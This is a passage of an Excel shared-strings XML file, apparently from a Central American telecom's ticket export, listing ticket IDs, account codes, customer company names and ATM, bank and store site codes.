    <t>F4616753</t>
  </si>
  <si>
    <t>F4616754</t>
  </si>
  <si>
    <t>F4616769</t>
  </si>
  <si>
    <t>F4616772</t>
  </si>
  <si>
    <t>F4616774</t>
  </si>
  <si>
    <t>F4616787</t>
  </si>
  <si>
    <t>F4616795</t>
  </si>
  <si>
    <t>F4616835</t>
  </si>
  <si>
    <t>F4616842</t>
  </si>
  <si>
    <t>F4616851</t>
  </si>
  <si>
    <t>F4616853</t>
  </si>
  <si>
    <t>F4616860</t>
  </si>
  <si>
    <t>F4616880</t>
  </si>
  <si>
    <t>F4616881</t>
  </si>
  <si>
    <t>F4616890</t>
  </si>
  <si>
    <t>F4616906</t>
  </si>
  <si>
    <t>F4616908</t>
  </si>
  <si>
    <t>F4616914</t>
  </si>
  <si>
    <t>F4616922</t>
  </si>
  <si>
    <t>F4616935</t>
  </si>
  <si>
    <t>F4616937</t>
  </si>
  <si>
    <t>F4616949</t>
  </si>
  <si>
    <t>F4617023</t>
  </si>
  <si>
    <t>F4617024</t>
  </si>
  <si>
    <t>F4617074</t>
  </si>
  <si>
    <t>F4617076</t>
  </si>
  <si>
    <t>F4617082</t>
  </si>
  <si>
    <t>F4617087</t>
  </si>
  <si>
    <t>F4617108</t>
  </si>
  <si>
    <t>F4617193</t>
  </si>
  <si>
    <t>F4617198</t>
  </si>
  <si>
    <t>F4617229</t>
  </si>
  <si>
    <t>F4617231</t>
  </si>
  <si>
    <t>F4617232</t>
  </si>
  <si>
    <t>F4617280</t>
  </si>
  <si>
    <t>F4617326</t>
  </si>
  <si>
    <t>F4617345</t>
  </si>
  <si>
    <t>F4617360</t>
  </si>
  <si>
    <t>F4617405</t>
  </si>
  <si>
    <t>F4617406</t>
  </si>
  <si>
    <t>F4617408</t>
  </si>
  <si>
    <t>F4617409</t>
  </si>
  <si>
    <t>F4617427</t>
  </si>
  <si>
    <t>F4617438</t>
  </si>
  <si>
    <t>F4617443</t>
  </si>
  <si>
    <t>F4617448</t>
  </si>
  <si>
    <t>F4617451</t>
  </si>
  <si>
    <t>F4617473</t>
  </si>
  <si>
    <t>F4617480</t>
  </si>
  <si>
    <t>F4617481</t>
  </si>
  <si>
    <t>F4617483</t>
  </si>
  <si>
    <t>F4617506</t>
  </si>
  <si>
    <t>F4617516</t>
  </si>
  <si>
    <t>F4617517</t>
  </si>
  <si>
    <t>F4617521</t>
  </si>
  <si>
    <t>F4617534</t>
  </si>
  <si>
    <t>F4617536</t>
  </si>
  <si>
    <t>F4617540</t>
  </si>
  <si>
    <t>F4617541</t>
  </si>
  <si>
    <t>F4617544</t>
  </si>
  <si>
    <t>F4617560</t>
  </si>
  <si>
    <t>F4617561</t>
  </si>
  <si>
    <t>F4617562</t>
  </si>
  <si>
    <t>F4617563</t>
  </si>
  <si>
    <t>F4617564</t>
  </si>
  <si>
    <t>F4617592</t>
  </si>
  <si>
    <t>F4617595</t>
  </si>
  <si>
    <t>F4617622</t>
  </si>
  <si>
    <t>F4617645</t>
  </si>
  <si>
    <t>F4617661</t>
  </si>
  <si>
    <t>F4617665</t>
  </si>
  <si>
    <t>F4617685</t>
  </si>
  <si>
    <t>F4617695</t>
  </si>
  <si>
    <t>F4617698</t>
  </si>
  <si>
    <t>F4617700</t>
  </si>
  <si>
    <t>F4617702</t>
  </si>
  <si>
    <t>F4617703</t>
  </si>
  <si>
    <t>F4617704</t>
  </si>
  <si>
    <t>F4617716</t>
  </si>
  <si>
    <t>F4617718</t>
  </si>
  <si>
    <t>F4617778</t>
  </si>
  <si>
    <t>F4617808</t>
  </si>
  <si>
    <t>F4617819</t>
  </si>
  <si>
    <t>F4617827</t>
  </si>
  <si>
    <t>F4617896</t>
  </si>
  <si>
    <t>F4617900</t>
  </si>
  <si>
    <t>F4617901</t>
  </si>
  <si>
    <t>F4617926</t>
  </si>
  <si>
    <t>F4617948</t>
  </si>
  <si>
    <t>F4617949</t>
  </si>
  <si>
    <t>F4618028</t>
  </si>
  <si>
    <t>F4618067</t>
  </si>
  <si>
    <t>F4618122</t>
  </si>
  <si>
    <t>F4618131</t>
  </si>
  <si>
    <t>F4618133</t>
  </si>
  <si>
    <t>F4618134</t>
  </si>
  <si>
    <t>F4618163</t>
  </si>
  <si>
    <t>F4618189</t>
  </si>
  <si>
    <t>F4618192</t>
  </si>
  <si>
    <t>F4618201</t>
  </si>
  <si>
    <t>F4618211</t>
  </si>
  <si>
    <t>F4618222</t>
  </si>
  <si>
    <t>F4618225</t>
  </si>
  <si>
    <t>F4618231</t>
  </si>
  <si>
    <t>F4618249</t>
  </si>
  <si>
    <t>F4618278</t>
  </si>
  <si>
    <t>F4618287</t>
  </si>
  <si>
    <t>F4618290</t>
  </si>
  <si>
    <t>F4618318</t>
  </si>
  <si>
    <t>F4618320</t>
  </si>
  <si>
    <t>F4618331</t>
  </si>
  <si>
    <t>F4618373</t>
  </si>
  <si>
    <t>F4618375</t>
  </si>
  <si>
    <t>F4618377</t>
  </si>
  <si>
    <t>F4618381</t>
  </si>
  <si>
    <t>F4618384</t>
  </si>
  <si>
    <t>F4618394</t>
  </si>
  <si>
    <t>F4618395</t>
  </si>
  <si>
    <t>F4618421</t>
  </si>
  <si>
    <t>F4618423</t>
  </si>
  <si>
    <t>F4618424</t>
  </si>
  <si>
    <t>F4618426</t>
  </si>
  <si>
    <t>F4618431</t>
  </si>
  <si>
    <t>F4618435</t>
  </si>
  <si>
    <t>F4618445</t>
  </si>
  <si>
    <t>F4618452</t>
  </si>
  <si>
    <t>F4618473</t>
  </si>
  <si>
    <t>F4618477</t>
  </si>
  <si>
    <t>F4618486</t>
  </si>
  <si>
    <t>F4618509</t>
  </si>
  <si>
    <t>F4618536</t>
  </si>
  <si>
    <t>F4618563</t>
  </si>
  <si>
    <t>F4618569</t>
  </si>
  <si>
    <t>F4618570</t>
  </si>
  <si>
    <t>F4618585</t>
  </si>
  <si>
    <t>F4618586</t>
  </si>
  <si>
    <t>F4618587</t>
  </si>
  <si>
    <t>F4618630</t>
  </si>
  <si>
    <t>F4618641</t>
  </si>
  <si>
    <t>F4618643</t>
  </si>
  <si>
    <t>F4618648</t>
  </si>
  <si>
    <t>F4618649</t>
  </si>
  <si>
    <t>F4618652</t>
  </si>
  <si>
    <t>F4618655</t>
  </si>
  <si>
    <t>F4618690</t>
  </si>
  <si>
    <t>F4618691</t>
  </si>
  <si>
    <t>F4618700</t>
  </si>
  <si>
    <t>F4618718</t>
  </si>
  <si>
    <t>F4618727</t>
  </si>
  <si>
    <t>F4618741</t>
  </si>
  <si>
    <t>F4618747</t>
  </si>
  <si>
    <t>F4618763</t>
  </si>
  <si>
    <t>F4618764</t>
  </si>
  <si>
    <t>F4618768</t>
  </si>
  <si>
    <t>F4618782</t>
  </si>
  <si>
    <t>F4618787</t>
  </si>
  <si>
    <t>F4618791</t>
  </si>
  <si>
    <t>F4618811</t>
  </si>
  <si>
    <t>F4618830</t>
  </si>
  <si>
    <t>F4618839</t>
  </si>
  <si>
    <t>F4618882</t>
  </si>
  <si>
    <t>F4618890</t>
  </si>
  <si>
    <t>F4618891</t>
  </si>
  <si>
    <t>F4618892</t>
  </si>
  <si>
    <t>F4618895</t>
  </si>
  <si>
    <t>F4618896</t>
  </si>
  <si>
    <t>F4618904</t>
  </si>
  <si>
    <t>F4618926</t>
  </si>
  <si>
    <t>F4618930</t>
  </si>
  <si>
    <t>F4618937</t>
  </si>
  <si>
    <t>F4618975</t>
  </si>
  <si>
    <t>F4618988</t>
  </si>
  <si>
    <t>F4619010</t>
  </si>
  <si>
    <t>F4619017</t>
  </si>
  <si>
    <t>F4619026</t>
  </si>
  <si>
    <t>F4619027</t>
  </si>
  <si>
    <t>F4619033</t>
  </si>
  <si>
    <t>F4619034</t>
  </si>
  <si>
    <t>F4619045</t>
  </si>
  <si>
    <t>F4619053</t>
  </si>
  <si>
    <t>F4619057</t>
  </si>
  <si>
    <t>F4619060</t>
  </si>
  <si>
    <t>F4619071</t>
  </si>
  <si>
    <t>F4619073</t>
  </si>
  <si>
    <t>F4619074</t>
  </si>
  <si>
    <t>F4619110</t>
  </si>
  <si>
    <t>F4619121</t>
  </si>
  <si>
    <t>F4619150</t>
  </si>
  <si>
    <t>F4619151</t>
  </si>
  <si>
    <t>F4619155</t>
  </si>
  <si>
    <t>F4619167</t>
  </si>
  <si>
    <t>F4619218</t>
  </si>
  <si>
    <t>F4619226</t>
  </si>
  <si>
    <t>F4619227</t>
  </si>
  <si>
    <t>F4619243</t>
  </si>
  <si>
    <t>F4619247</t>
  </si>
  <si>
    <t>F4619252</t>
  </si>
  <si>
    <t>F4619260</t>
  </si>
  <si>
    <t>F4619287</t>
  </si>
  <si>
    <t>F4619298</t>
  </si>
  <si>
    <t>F4619311</t>
  </si>
  <si>
    <t>F4619331</t>
  </si>
  <si>
    <t>F4619410</t>
  </si>
  <si>
    <t>F4619448</t>
  </si>
  <si>
    <t>F4619495</t>
  </si>
  <si>
    <t>F4619515</t>
  </si>
  <si>
    <t>F4619554</t>
  </si>
  <si>
    <t>F4619589</t>
  </si>
  <si>
    <t>F4619590</t>
  </si>
  <si>
    <t>F4619606</t>
  </si>
  <si>
    <t>F4619614</t>
  </si>
  <si>
    <t>F4619628</t>
  </si>
  <si>
    <t>F4619650</t>
  </si>
  <si>
    <t>F4619699</t>
  </si>
  <si>
    <t>F4619703</t>
  </si>
  <si>
    <t>F4619705</t>
  </si>
  <si>
    <t>F4619711</t>
  </si>
  <si>
    <t>F4619736</t>
  </si>
  <si>
    <t>F4619744</t>
  </si>
  <si>
    <t>F4619794</t>
  </si>
  <si>
    <t>F4619799</t>
  </si>
  <si>
    <t>F4619802</t>
  </si>
  <si>
    <t>F4619808</t>
  </si>
  <si>
    <t>F4619815</t>
  </si>
  <si>
    <t>F4619817</t>
  </si>
  <si>
    <t>F4619821</t>
  </si>
  <si>
    <t>F4619831</t>
  </si>
  <si>
    <t>F4619833</t>
  </si>
  <si>
    <t>F4619837</t>
  </si>
  <si>
    <t>F4619851</t>
  </si>
  <si>
    <t>F4619860</t>
  </si>
  <si>
    <t>F4619871</t>
  </si>
  <si>
    <t>F4619877</t>
  </si>
  <si>
    <t>F4619884</t>
  </si>
  <si>
    <t>F4619885</t>
  </si>
  <si>
    <t>F4619894</t>
  </si>
  <si>
    <t>F4619896</t>
  </si>
  <si>
    <t>F4619898</t>
  </si>
  <si>
    <t>F4619914</t>
  </si>
  <si>
    <t>F4619929</t>
  </si>
  <si>
    <t>F4619932</t>
  </si>
  <si>
    <t>F4619951</t>
  </si>
  <si>
    <t>F4619957</t>
  </si>
  <si>
    <t>F4619986</t>
  </si>
  <si>
    <t>F4619987</t>
  </si>
  <si>
    <t>F4619991</t>
  </si>
  <si>
    <t>F4619992</t>
  </si>
  <si>
    <t>F4620017</t>
  </si>
  <si>
    <t>F4620026</t>
  </si>
  <si>
    <t>F4620035</t>
  </si>
  <si>
    <t>F4620041</t>
  </si>
  <si>
    <t>F4620051</t>
  </si>
  <si>
    <t>F4620058</t>
  </si>
  <si>
    <t>F4620075</t>
  </si>
  <si>
    <t>F4620083</t>
  </si>
  <si>
    <t>F4620087</t>
  </si>
  <si>
    <t>F4620099</t>
  </si>
  <si>
    <t>F4620110</t>
  </si>
  <si>
    <t>F4620113</t>
  </si>
  <si>
    <t>F4620128</t>
  </si>
  <si>
    <t>F4620144</t>
  </si>
  <si>
    <t>F4620146</t>
  </si>
  <si>
    <t>F4620150</t>
  </si>
  <si>
    <t>F4620151</t>
  </si>
  <si>
    <t>F4620180</t>
  </si>
  <si>
    <t>F4620211</t>
  </si>
  <si>
    <t>F4620215</t>
  </si>
  <si>
    <t>F4620217</t>
  </si>
  <si>
    <t>F4620230</t>
  </si>
  <si>
    <t>F4620278</t>
  </si>
  <si>
    <t>F4620294</t>
  </si>
  <si>
    <t>F4620295</t>
  </si>
  <si>
    <t>F4620296</t>
  </si>
  <si>
    <t>F4620315</t>
  </si>
  <si>
    <t>F4620321</t>
  </si>
  <si>
    <t>F4620327</t>
  </si>
  <si>
    <t>F4620338</t>
  </si>
  <si>
    <t>F4620354</t>
  </si>
  <si>
    <t>F4620362</t>
  </si>
  <si>
    <t>F4620364</t>
  </si>
  <si>
    <t>F4620388</t>
  </si>
  <si>
    <t>F4620397</t>
  </si>
  <si>
    <t>F4620409</t>
  </si>
  <si>
    <t>F4620413</t>
  </si>
  <si>
    <t>F4620426</t>
  </si>
  <si>
    <t>F4620454</t>
  </si>
  <si>
    <t>F4620488</t>
  </si>
  <si>
    <t>F4620507</t>
  </si>
  <si>
    <t>F4620536</t>
  </si>
  <si>
    <t>F4620539</t>
  </si>
  <si>
    <t>F4620562</t>
  </si>
  <si>
    <t>F4620583</t>
  </si>
  <si>
    <t>F4620586</t>
  </si>
  <si>
    <t>F4620588</t>
  </si>
  <si>
    <t>F4620594</t>
  </si>
  <si>
    <t>F4620646</t>
  </si>
  <si>
    <t>F4620647</t>
  </si>
  <si>
    <t>F4620654</t>
  </si>
  <si>
    <t>F4620673</t>
  </si>
  <si>
    <t>F4620677</t>
  </si>
  <si>
    <t>F4620678</t>
  </si>
  <si>
    <t>F4620720</t>
  </si>
  <si>
    <t>F4620739</t>
  </si>
  <si>
    <t>F4620741</t>
  </si>
  <si>
    <t>F4620757</t>
  </si>
  <si>
    <t>F4620758</t>
  </si>
  <si>
    <t>F4620765</t>
  </si>
  <si>
    <t>F4620770</t>
  </si>
  <si>
    <t>F4620781</t>
  </si>
  <si>
    <t>F4620786</t>
  </si>
  <si>
    <t>F4620790</t>
  </si>
  <si>
    <t>F4620818</t>
  </si>
  <si>
    <t>F4620832</t>
  </si>
  <si>
    <t>F4620845</t>
  </si>
  <si>
    <t>F4620867</t>
  </si>
  <si>
    <t>F4620896</t>
  </si>
  <si>
    <t>F4620912</t>
  </si>
  <si>
    <t>F4620936</t>
  </si>
  <si>
    <t>F4621020</t>
  </si>
  <si>
    <t>F4621022</t>
  </si>
  <si>
    <t>F4621049</t>
  </si>
  <si>
    <t>F4621056</t>
  </si>
  <si>
    <t>F4621087</t>
  </si>
  <si>
    <t>F4621120</t>
  </si>
  <si>
    <t>F4621142</t>
  </si>
  <si>
    <t>F4621152</t>
  </si>
  <si>
    <t>F4621153</t>
  </si>
  <si>
    <t>F4621179</t>
  </si>
  <si>
    <t>F4621201</t>
  </si>
  <si>
    <t>F4621211</t>
  </si>
  <si>
    <t>F4621214</t>
  </si>
  <si>
    <t>F4621221</t>
  </si>
  <si>
    <t>F4621225</t>
  </si>
  <si>
    <t>F4621293</t>
  </si>
  <si>
    <t>F4621313</t>
  </si>
  <si>
    <t>F4621316</t>
  </si>
  <si>
    <t>F4621320</t>
  </si>
  <si>
    <t>F4621328</t>
  </si>
  <si>
    <t>F4621343</t>
  </si>
  <si>
    <t>F4621344</t>
  </si>
  <si>
    <t>F4621348</t>
  </si>
  <si>
    <t>F4621349</t>
  </si>
  <si>
    <t>F4621352</t>
  </si>
  <si>
    <t>F4621362</t>
  </si>
  <si>
    <t>F4621366</t>
  </si>
  <si>
    <t>F4621374</t>
  </si>
  <si>
    <t>F4621379</t>
  </si>
  <si>
    <t>F4621382</t>
  </si>
  <si>
    <t>F4621388</t>
  </si>
  <si>
    <t>F4621390</t>
  </si>
  <si>
    <t>F4621391</t>
  </si>
  <si>
    <t>F4621409</t>
  </si>
  <si>
    <t>F4621425</t>
  </si>
  <si>
    <t>F4621426</t>
  </si>
  <si>
    <t>F4621434</t>
  </si>
  <si>
    <t>F4621435</t>
  </si>
  <si>
    <t>F4621442</t>
  </si>
  <si>
    <t>F4621443</t>
  </si>
  <si>
    <t>F4621444</t>
  </si>
  <si>
    <t>F4621445</t>
  </si>
  <si>
    <t>F4621477</t>
  </si>
  <si>
    <t>F4621480</t>
  </si>
  <si>
    <t>F4621484</t>
  </si>
  <si>
    <t>F4621506</t>
  </si>
  <si>
    <t>F4621542</t>
  </si>
  <si>
    <t>F4621550</t>
  </si>
  <si>
    <t>F4621552</t>
  </si>
  <si>
    <t>F4621553</t>
  </si>
  <si>
    <t>F4621559</t>
  </si>
  <si>
    <t>F4621586</t>
  </si>
  <si>
    <t>F4621594</t>
  </si>
  <si>
    <t>F4621629</t>
  </si>
  <si>
    <t>F4621632</t>
  </si>
  <si>
    <t>F4621642</t>
  </si>
  <si>
    <t>F4621667</t>
  </si>
  <si>
    <t>F4621675</t>
  </si>
  <si>
    <t>F4621677</t>
  </si>
  <si>
    <t>F4621689</t>
  </si>
  <si>
    <t>F4621694</t>
  </si>
  <si>
    <t>F4621699</t>
  </si>
  <si>
    <t>F4621709</t>
  </si>
  <si>
    <t>F4621746</t>
  </si>
  <si>
    <t>F4621748</t>
  </si>
  <si>
    <t>F4621755</t>
  </si>
  <si>
    <t>F4621772</t>
  </si>
  <si>
    <t>F4621777</t>
  </si>
  <si>
    <t>F4621797</t>
  </si>
  <si>
    <t>F4621812</t>
  </si>
  <si>
    <t>F4621814</t>
  </si>
  <si>
    <t>F4621818</t>
  </si>
  <si>
    <t>F4621823</t>
  </si>
  <si>
    <t>F4621824</t>
  </si>
  <si>
    <t>F4621827</t>
  </si>
  <si>
    <t>F4621834</t>
  </si>
  <si>
    <t>F4621838</t>
  </si>
  <si>
    <t>F4621854</t>
  </si>
  <si>
    <t>F4621865</t>
  </si>
  <si>
    <t>F4621870</t>
  </si>
  <si>
    <t>F4621872</t>
  </si>
  <si>
    <t>F4621873</t>
  </si>
  <si>
    <t>F4621886</t>
  </si>
  <si>
    <t>F4621889</t>
  </si>
  <si>
    <t>F4621890</t>
  </si>
  <si>
    <t>F4621899</t>
  </si>
  <si>
    <t>F4621912</t>
  </si>
  <si>
    <t>F4621923</t>
  </si>
  <si>
    <t>F4621928</t>
  </si>
  <si>
    <t>F4621938</t>
  </si>
  <si>
    <t>F4621939</t>
  </si>
  <si>
    <t>F4621960</t>
  </si>
  <si>
    <t>F4622001</t>
  </si>
  <si>
    <t>F4622035</t>
  </si>
  <si>
    <t>F4622042</t>
  </si>
  <si>
    <t>F4622050</t>
  </si>
  <si>
    <t>F4622051</t>
  </si>
  <si>
    <t>F4622057</t>
  </si>
  <si>
    <t>F4622068</t>
  </si>
  <si>
    <t>F4622078</t>
  </si>
  <si>
    <t>F4622094</t>
  </si>
  <si>
    <t>F4622105</t>
  </si>
  <si>
    <t>F4622156</t>
  </si>
  <si>
    <t>F4622171</t>
  </si>
  <si>
    <t>F4622174</t>
  </si>
  <si>
    <t>F4622209</t>
  </si>
  <si>
    <t>F4622212</t>
  </si>
  <si>
    <t>F4622217</t>
  </si>
  <si>
    <t>F4622250</t>
  </si>
  <si>
    <t>F4622275</t>
  </si>
  <si>
    <t>F4622285</t>
  </si>
  <si>
    <t>F4622306</t>
  </si>
  <si>
    <t>F4622307</t>
  </si>
  <si>
    <t>F4622310</t>
  </si>
  <si>
    <t>F4622314</t>
  </si>
  <si>
    <t>F4622329</t>
  </si>
  <si>
    <t>F4622339</t>
  </si>
  <si>
    <t>F4622341</t>
  </si>
  <si>
    <t>F4622407</t>
  </si>
  <si>
    <t>F4622423</t>
  </si>
  <si>
    <t>F4622559</t>
  </si>
  <si>
    <t>F4622594</t>
  </si>
  <si>
    <t>F4622595</t>
  </si>
  <si>
    <t>F4622619</t>
  </si>
  <si>
    <t>F4622621</t>
  </si>
  <si>
    <t>F4622623</t>
  </si>
  <si>
    <t>F4622624</t>
  </si>
  <si>
    <t>F4622656</t>
  </si>
  <si>
    <t>F4622658</t>
  </si>
  <si>
    <t>F4622659</t>
  </si>
  <si>
    <t>F4622660</t>
  </si>
  <si>
    <t>F4622687</t>
  </si>
  <si>
    <t>F4622694</t>
  </si>
  <si>
    <t>F4622703</t>
  </si>
  <si>
    <t>F4622704</t>
  </si>
  <si>
    <t>F4622709</t>
  </si>
  <si>
    <t>F4622711</t>
  </si>
  <si>
    <t>F4622715</t>
  </si>
  <si>
    <t>F4622725</t>
  </si>
  <si>
    <t>F4622782</t>
  </si>
  <si>
    <t>F4622791</t>
  </si>
  <si>
    <t>F4622793</t>
  </si>
  <si>
    <t>F4622796</t>
  </si>
  <si>
    <t>F4622828</t>
  </si>
  <si>
    <t>F4622848</t>
  </si>
  <si>
    <t>F4622855</t>
  </si>
  <si>
    <t>F4622856</t>
  </si>
  <si>
    <t>F4622861</t>
  </si>
  <si>
    <t>F4622878</t>
  </si>
  <si>
    <t>F4622879</t>
  </si>
  <si>
    <t>F4622882</t>
  </si>
  <si>
    <t>F4622911</t>
  </si>
  <si>
    <t>F4622959</t>
  </si>
  <si>
    <t>F4622965</t>
  </si>
  <si>
    <t>F4622971</t>
  </si>
  <si>
    <t>F4622997</t>
  </si>
  <si>
    <t>F4623004</t>
  </si>
  <si>
    <t>F4623040</t>
  </si>
  <si>
    <t>F4623044</t>
  </si>
  <si>
    <t>F4623053</t>
  </si>
  <si>
    <t>F4623063</t>
  </si>
  <si>
    <t>F4623104</t>
  </si>
  <si>
    <t>F4623116</t>
  </si>
  <si>
    <t>F4623120</t>
  </si>
  <si>
    <t>F4623132</t>
  </si>
  <si>
    <t>F4623170</t>
  </si>
  <si>
    <t>F4623176</t>
  </si>
  <si>
    <t>F4623187</t>
  </si>
  <si>
    <t>F4623191</t>
  </si>
  <si>
    <t>F4623203</t>
  </si>
  <si>
    <t>F4623208</t>
  </si>
  <si>
    <t>F4623229</t>
  </si>
  <si>
    <t>F4623230</t>
  </si>
  <si>
    <t>F4623248</t>
  </si>
  <si>
    <t>F4623252</t>
  </si>
  <si>
    <t>F4623254</t>
  </si>
  <si>
    <t>F4623267</t>
  </si>
  <si>
    <t>F4623271</t>
  </si>
  <si>
    <t>F4623272</t>
  </si>
  <si>
    <t>F4623278</t>
  </si>
  <si>
    <t>F4623305</t>
  </si>
  <si>
    <t>F4623324</t>
  </si>
  <si>
    <t>F4623401</t>
  </si>
  <si>
    <t>F4623445</t>
  </si>
  <si>
    <t>F4623474</t>
  </si>
  <si>
    <t>F4623522</t>
  </si>
  <si>
    <t>F4623545</t>
  </si>
  <si>
    <t>F4623574</t>
  </si>
  <si>
    <t>F4623632</t>
  </si>
  <si>
    <t>F4623635</t>
  </si>
  <si>
    <t>F4623667</t>
  </si>
  <si>
    <t>DX - ADMINISTRATIVO</t>
  </si>
  <si>
    <t>CLARO UM</t>
  </si>
  <si>
    <t>8900960T</t>
  </si>
  <si>
    <t>8901444T</t>
  </si>
  <si>
    <t>F4413440</t>
  </si>
  <si>
    <t>FMN006L</t>
  </si>
  <si>
    <t>8902076T</t>
  </si>
  <si>
    <t>F4515755</t>
  </si>
  <si>
    <t>8901403T</t>
  </si>
  <si>
    <t>8901401T</t>
  </si>
  <si>
    <t>IP2033160SV</t>
  </si>
  <si>
    <t>F4562880</t>
  </si>
  <si>
    <t>628737OH</t>
  </si>
  <si>
    <t>F4562884</t>
  </si>
  <si>
    <t>885200001T</t>
  </si>
  <si>
    <t>ASUNTOS REGULATORIOS REGISTREK, S.A.</t>
  </si>
  <si>
    <t>F4562917</t>
  </si>
  <si>
    <t>47503083T</t>
  </si>
  <si>
    <t>47503208T</t>
  </si>
  <si>
    <t>F4562930</t>
  </si>
  <si>
    <t>47503248T</t>
  </si>
  <si>
    <t>F4562940</t>
  </si>
  <si>
    <t>F4562944</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4152</t>
  </si>
  <si>
    <t>F4562951</t>
  </si>
  <si>
    <t>F4562952</t>
  </si>
  <si>
    <t>F4562973</t>
  </si>
  <si>
    <t>F4563028</t>
  </si>
  <si>
    <t>F4589142</t>
  </si>
  <si>
    <t>F4589143</t>
  </si>
  <si>
    <t>26844900SV</t>
  </si>
  <si>
    <t>NEGOCIOS DE ORIENTE S.A. DE C.V.</t>
  </si>
  <si>
    <t>3502688ON</t>
  </si>
  <si>
    <t>ON0000621929/MINISTERIO DE LA FAM .PROYECTO PBS              MINISTERI</t>
  </si>
  <si>
    <t>ID1145167SV</t>
  </si>
  <si>
    <t>MARTIR JOEL ESCOBAR RIVERA</t>
  </si>
  <si>
    <t>22516600SV</t>
  </si>
  <si>
    <t>23192450SV</t>
  </si>
  <si>
    <t>ACACYPAC, NC DE R.L.</t>
  </si>
  <si>
    <t>F4589193</t>
  </si>
  <si>
    <t>F4589205</t>
  </si>
  <si>
    <t>336800004T</t>
  </si>
  <si>
    <t>8901987T</t>
  </si>
  <si>
    <t>F4589222</t>
  </si>
  <si>
    <t>F4589223</t>
  </si>
  <si>
    <t>F4589224</t>
  </si>
  <si>
    <t>333600049T</t>
  </si>
  <si>
    <t>F4589230</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CIUDAD_REAL</t>
  </si>
  <si>
    <t>DX - INDIVIDUAL</t>
  </si>
  <si>
    <t>F4589249</t>
  </si>
  <si>
    <t>90001910857T</t>
  </si>
  <si>
    <t>24527900SV</t>
  </si>
  <si>
    <t>F4589257</t>
  </si>
  <si>
    <t>3806016ON</t>
  </si>
  <si>
    <t>ON0000687932/SILAIS MANAGUA-</t>
  </si>
  <si>
    <t>F4589263</t>
  </si>
  <si>
    <t>361700401T</t>
  </si>
  <si>
    <t>F4589268</t>
  </si>
  <si>
    <t>4948650ON</t>
  </si>
  <si>
    <t>F4589289</t>
  </si>
  <si>
    <t>F4589290</t>
  </si>
  <si>
    <t>F4546935</t>
  </si>
  <si>
    <t>F4546940</t>
  </si>
  <si>
    <t>3472324ON</t>
  </si>
  <si>
    <t>F4546971</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_IXTAHUACAN</t>
  </si>
  <si>
    <t>F4546982</t>
  </si>
  <si>
    <t>F4547006</t>
  </si>
  <si>
    <t>F4547007</t>
  </si>
  <si>
    <t>770600211T</t>
  </si>
  <si>
    <t>F4547012</t>
  </si>
  <si>
    <t>F4547029</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1715</t>
  </si>
  <si>
    <t>F4547052</t>
  </si>
  <si>
    <t>90001909022T</t>
  </si>
  <si>
    <t>HOSPITAL YARDEN S.A</t>
  </si>
  <si>
    <t>770600183T</t>
  </si>
  <si>
    <t>F4547067</t>
  </si>
  <si>
    <t>F4547070</t>
  </si>
  <si>
    <t>62300208T</t>
  </si>
  <si>
    <t>F4547075</t>
  </si>
  <si>
    <t>F4547077</t>
  </si>
  <si>
    <t>F4547079</t>
  </si>
  <si>
    <t>F4547080</t>
  </si>
  <si>
    <t>F4547088</t>
  </si>
  <si>
    <t>F4577374</t>
  </si>
  <si>
    <t>F4577375</t>
  </si>
  <si>
    <t>4109118ON</t>
  </si>
  <si>
    <t>22898646SV</t>
  </si>
  <si>
    <t>FOOD TRENDS, S.A DE C.V.</t>
  </si>
  <si>
    <t>F4577383</t>
  </si>
  <si>
    <t>8900244T</t>
  </si>
  <si>
    <t>F4577390</t>
  </si>
  <si>
    <t>F4577391</t>
  </si>
  <si>
    <t>F4577399</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3136</t>
  </si>
  <si>
    <t>IP2113003SV</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_CHIQUIMULA</t>
  </si>
  <si>
    <t>F4577404</t>
  </si>
  <si>
    <t>39200044T</t>
  </si>
  <si>
    <t>IDG000632SV</t>
  </si>
  <si>
    <t>SOSTENGO, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4577442</t>
  </si>
  <si>
    <t>F4577458</t>
  </si>
  <si>
    <t>8901193T</t>
  </si>
  <si>
    <t>F4577466</t>
  </si>
  <si>
    <t>F4577501</t>
  </si>
  <si>
    <t>F4577502</t>
  </si>
  <si>
    <t>F4577503</t>
  </si>
  <si>
    <t>F4577518</t>
  </si>
  <si>
    <t>F4577523</t>
  </si>
  <si>
    <t>F4577531</t>
  </si>
  <si>
    <t>F4577532</t>
  </si>
  <si>
    <t>F4577538</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_PUNTO_CENTRAL_PRINCIPAL</t>
  </si>
  <si>
    <t>F4613316</t>
  </si>
  <si>
    <t>F4613319</t>
  </si>
  <si>
    <t>ICXN-00073OC</t>
  </si>
  <si>
    <t>F4579979</t>
  </si>
  <si>
    <t>341200004T</t>
  </si>
  <si>
    <t>F4580004</t>
  </si>
  <si>
    <t>658300003T</t>
  </si>
  <si>
    <t>BUSINESS CENTERS OF THE AMERICAS</t>
  </si>
  <si>
    <t>F4580040</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3686</t>
  </si>
  <si>
    <t>F4580044</t>
  </si>
  <si>
    <t>1086447OH</t>
  </si>
  <si>
    <t>F4580048</t>
  </si>
  <si>
    <t>F4580051</t>
  </si>
  <si>
    <t>F4580059</t>
  </si>
  <si>
    <t>F4580060</t>
  </si>
  <si>
    <t>F4580066</t>
  </si>
  <si>
    <t>F4580073</t>
  </si>
  <si>
    <t>763412OH</t>
  </si>
  <si>
    <t>F4580075</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_147</t>
  </si>
  <si>
    <t>F4580087</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_CALLE_MARTI</t>
  </si>
  <si>
    <t>F4580089</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0276</t>
  </si>
  <si>
    <t>F4549344</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC006849</t>
  </si>
  <si>
    <t>8902498T</t>
  </si>
  <si>
    <t>F4549359</t>
  </si>
  <si>
    <t>F4549360</t>
  </si>
  <si>
    <t>1479298OH</t>
  </si>
  <si>
    <t>DISTRIBUIDORA DE SEGURIDAD ELECTRICA</t>
  </si>
  <si>
    <t>433000002T</t>
  </si>
  <si>
    <t>GEOGRAFIA Y FORESTERIA S.A.</t>
  </si>
  <si>
    <t>F4549373</t>
